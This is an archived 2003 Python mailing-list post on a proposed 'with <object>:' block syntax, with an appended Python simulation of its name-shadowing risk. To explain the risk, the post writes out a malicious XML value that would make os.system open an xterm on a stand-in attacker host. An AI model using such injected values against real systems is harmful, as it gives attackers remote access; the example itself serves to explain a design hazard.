Code block literals

Andrew Dalke adalke at mindspring.com
Thu Oct 9 17:31:12 EDT 2003


Dave Benjamin:
> What's implicit to me is that the use of an iterator is never specified.

It is by the definition of what the for loop does.

> For instance, we could (and I'm *not* suggesting this) do this:
>
> iterator = file('input.txt')
> while iterator.has_next():
>     line = iterator.next()
>     do_something_with(line)

Good thing you aren't, since has_next might be impossible to
implement. ;)

> > If Python's syntax defined
> > other forms of suites, e.g. hypothetically:
> >
> > with <object>:
> >     <suite>
> >
> > meaning to call the object (or some given method[s] in it, whatever)
> > with the suite as its argument, it would be just as explicit as, e.g.:
> >
> > for <name> in <object>:
> >     <suite>

A reasonable point.  However, inside the 'with' statement it's hard
to know if

   print x

comes from the object or from the static scoping, and it may
be that 99.99% of the time it's from static scoping, only to find
after deployment that there's code like

logger = "echo got it >> file.log"

...
def parse_server_request(self, infile, outfile):
    obj = parse_XML_into_some_pythonic_data_structure(infile)
    with obj:
      outfile.write("Content-Type: text/plain\n\n")
      outfile.write("Hi, " + username + "\n")
      os.system(logger)

which lets malicious user input pass in XML with the content
  <logger>xterm -display evil.machine.example.com:0</logger>
that ends up being passed to the system call.

I've been on this thread too long so I won't answer anything from the rest
of your response.  :(

                    Andrew
                    dalke at dalkescientific.com
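Added example, not code from the original post or from any Python release: a simulation of the hypothetical 'with <object>:' name lookup described above, showing that an untrusted <logger> element in the XML shadows the static logger, beside a shadowing check and the explicit-access form. The names parse_request, resolve_in_with, shadowed_names, command_under_with and command_explicit are hypothetical.

```python
"""Simulates the hypothetical 'with <object>: <suite>' lookup discussed above:
a name is looked up in the object first, then in the enclosing static scope.
All function names here are hypothetical; nothing below runs a command."""
import xml.etree.ElementTree as ET

# Static (module-level) name the author meant os.system to receive.
logger = "echo got it >> file.log"

def parse_request(xml_text):
    """Naive XML-to-dict: every child tag of the root becomes a key, so the
    sender of the XML decides which names the object carries."""
    root = ET.fromstring(xml_text)
    return {child.tag: (child.text or "") for child in root}

def resolve_in_with(obj, name, static_scope):
    """Hypothetical 'with obj:' semantics: object entries win over static scope."""
    return obj[name] if name in obj else static_scope[name]

def shadowed_names(obj, static_scope):
    """Defensive check: which trusted static names does the untrusted object override?"""
    return sorted(set(obj) & set(static_scope))

def command_under_with(obj):
    """The string os.system(logger) would receive inside 'with obj:' (not executed)."""
    return resolve_in_with(obj, "logger", {"logger": logger})

def command_explicit(obj):
    """Explicit form: only username is read from obj; logger stays static."""
    greeting = "Hi, " + obj["username"] + "\n"
    return greeting, logger

# Constructed request: the sender added a <logger> element alongside <username>.
UNTRUSTED_XML = ("<request><username>alice</username>"
                 "<logger>echo INJECTED</logger></request>")

if __name__ == "__main__":
    obj = parse_request(UNTRUSTED_XML)
    print("shadowed:", shadowed_names(obj, {"logger": logger}))   # ['logger']
    print("under with:", command_under_with(obj))                  # echo INJECTED
    print("explicit:", command_explicit(obj)[1])                   # echo got it >> file.log
```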
